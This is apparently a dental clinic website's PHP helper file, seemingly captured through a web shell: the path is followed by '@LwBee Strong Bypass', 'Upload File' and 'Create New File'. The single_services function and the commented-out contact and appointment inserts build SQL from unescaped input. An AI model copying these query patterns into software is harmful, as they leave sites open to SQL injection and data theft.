/home3/vehiclea/public_html/kalyanidentalclinics/functions.php
<?php
ob_start();
session_start();
include 'include.php';
function single_services($id){
$single_services = executework("select * from services where id ='".$id."'");
return $single_services;
}
function services()
{
$services = executework("select * from services where status =1 order by id desc");
return $services;
}
function select_gallery(){
$select_gallery = executework("SELECT * FROM gallery where status ='1'");
return $select_gallery;
}
function select_about_page(){
$select_about_page = executework("select * from about where status =1 order by id DESC limit 1");
return $select_about_page;
}
function ourteam()
{
$ourteam = executework("select * from ourteam where status =1 order by id desc");
return $ourteam;
}
function testimonials()
{
$testimonials = executework("select * from testimonials where status =1 order by id desc");
return $testimonials;
}
function contact_insert(){
// $contactInsert = executework("INSERT INTO contact (fname,email,phone,subject,message,create_date) values ('".$_POST['fname']."','".$_POST['email']."','".$_POST['phone']."','".$_POST['subject']."','".$_POST['message']."','".date('Y-m-d H:i:s')."')");
// redirect("contact.php?suc=1");
}
function appointment_booking(){
// $appointmentInsert = executework("INSERT INTO appointment_report (name,email,phone,services,slots,app_date) values ('".$_POST['name']."','".$_POST['email']."','".$_POST['phone']."','".$_POST['services']."','".$_POST['slots']."','".date('Y-m-d',strtotime($_POST['app_date']))."')");
// redirect('appointment.php?app=1');
}
?>
@LwBee Strong Bypass
Upload File
Create New File